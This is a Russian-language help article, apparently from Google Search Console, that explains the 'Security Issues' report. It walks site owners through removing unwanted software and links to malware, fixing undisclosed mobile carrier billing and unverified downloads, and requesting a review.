Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве. Завершив подготовку к очистке сайта, вы можете заменить зараженные файлы надежными резервными или удалить спам самостоятельно. Используйте антивирусные программы, чтобы проверить исполняемые файлы и другие данные, размещенные на вашем сайте. Антивирусные программы (или сервисы, использующие сразу несколько антивирусов, например VirusTotal) позволяют обнаружить многие, но далеко не все типы вредоносного и нежелательного ПО. Поэтому результаты такой проверки должны послужить вам отправной точкой для более тщательного анализа. Google Безопасный просмотр по собственным критериям оценивает, являются ли те или иные программы и исполняемые файлы вредоносными.

5. Убедитесь, что все проблемы решены

Проверьте сайт на соответствие Правилам в отношении нежелательного ПО.

6. Запрос проверки

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Ссылки для скачивания вредоносного ПО

На вашем сайте содержатся ссылки на ресурсы, где, по данным Google Безопасного просмотра, посетителям предлагается скачать вредоносное или нежелательное ПО. В этом случае посетителям сайта в браузере Chrome может показываться предупреждение. Чтобы оно не появлялось, вам необходимо удалить ссылки на небезопасные ресурсы.

1. Изучите проблему

Если ссылки размещены намеренно, удалите их с сайта и перейдите к разделу запросите проверку.

Если подобные ссылки вам незнакомы, вероятно, ваш сайт был взломан.

2. Выясните, можете ли вы решить проблему самостоятельно

Если ваш сайт был взломан, изучите специальные материалы, которые помогут определить, под силу ли вам справиться с проблемой самостоятельно, а если нет, то как привлечь необходимых специалистов.

3. Убедитесь в наличии проблемы

 

Чтобы убедиться, что на сайте действительно есть ссылки на небезопасные ресурсы, изучите несколько примеров страниц. В некоторых случаях ссылки могут быть от вас скрыты, поэтому попробуйте открыть примеры URL, используя инструмент проверки URL. Можно также попробовать сделать это из другого аккаунта или с другого компьютера.

4. Очистите сайт

Вы можете изучить подробные сведения о том, как устранить проблемы на сайте, в частности как удалить нежелательное ПО и обезопаситься от злоумышленников в дальнейшем, в специальном руководстве. Завершив подготовку к очистке сайта, вы можете заменить зараженные файлы надежными резервными или удалить спам самостоятельно.

5. Убедитесь, что все проблемы решены

Проверьте сайт на соответствие Правилам в отношении нежелательного ПО.

6. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Списание средств через операторов мобильной связи без предупреждения

Если Google обнаружит, что вы не информируете пользователей мобильных устройств о платежах, в браузере Chrome перед загрузкой ваших страниц с платным контентом может показываться соответствующее предупреждение.

1. Убедитесь в наличии проблемы

Откройте примеры URL, перечисленные в отчете, и найдите страницы, на которых выполняется списание средств через операторов мобильной связи без предупреждения. Требования к списанию средств представлены в Справочном центре.

2. Устраните проблему

Приведите страницы своего сайта в соответствие со специальными требованиями.

3. Запросите проверку

Убедившись, что все проблемы на сайте устранены, запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель.

Загрузки неизвестного ПО

Посетителям вашего сайта предлагается скачать материалы, которые ещё не проверены средствами Google Безопасного просмотра. В этом случае в браузере Chrome может появиться предупреждение, что эти материалы редко скачивались и могут оказаться опасными. Оно пропадет, как только мы установим, что материалы не являются вредоносными. Учтите, что примеры URL, на которых обнаружена эта проблема, могут быть доступны не всегда.

Предупреждение отображается в браузере Chrome каждый раз, когда пользователь впервые загружает неизвестный файл, но оно не препятствует появлению вашего сайта в результатах поиска Google.

1. Устраните проблему

Найдите материалы, которые предлагается скачать, и проверьте их на соответствие специальным рекомендациям.

  • Если материалы нарушают рекомендации, удалите их.
  • Если нарушений нет, удалять материалы необязательно.

2. Запросите проверку

Проверив материалы (и при необходимости удалив их), запросите проверку с помощью отчета "Проблемы безопасности". Проверка может занять как несколько дней, так и несколько недель. Даже если вы ее не запросите, мы все равно через некоторое время перепроверим загружаемые файлы и присвоим им категорию. Но, отправив запрос, вы можете ускорить эту процедуру.

 

В чем разница между отчетами "Меры, принятые вручную" и "Проблемы безопасности"?

Отчет Меры, принятые вручную уведомляет о нарушениях, которые влияют на поисковый индекс, но могут не представлять опасности для пользователей. Как правило, в этом случае мы понижаем рейтинг сайта в результатах поиска или удаляем его из них. При этом пользователь не получает оповещения.

Из отчета Проблемы безопасности можно узнать, не был ли сайт взломан и не представляет ли он опасность для посетителей, например содержит вредоносное и нежелательное ПО или используется для фишинга. В результатах поиска такие страницы помечены значком предупреждения, а при попытке перейти на них открывается страница с предостережением.

Эта информация оказалась полезной?
Как можно улучшить эту статью?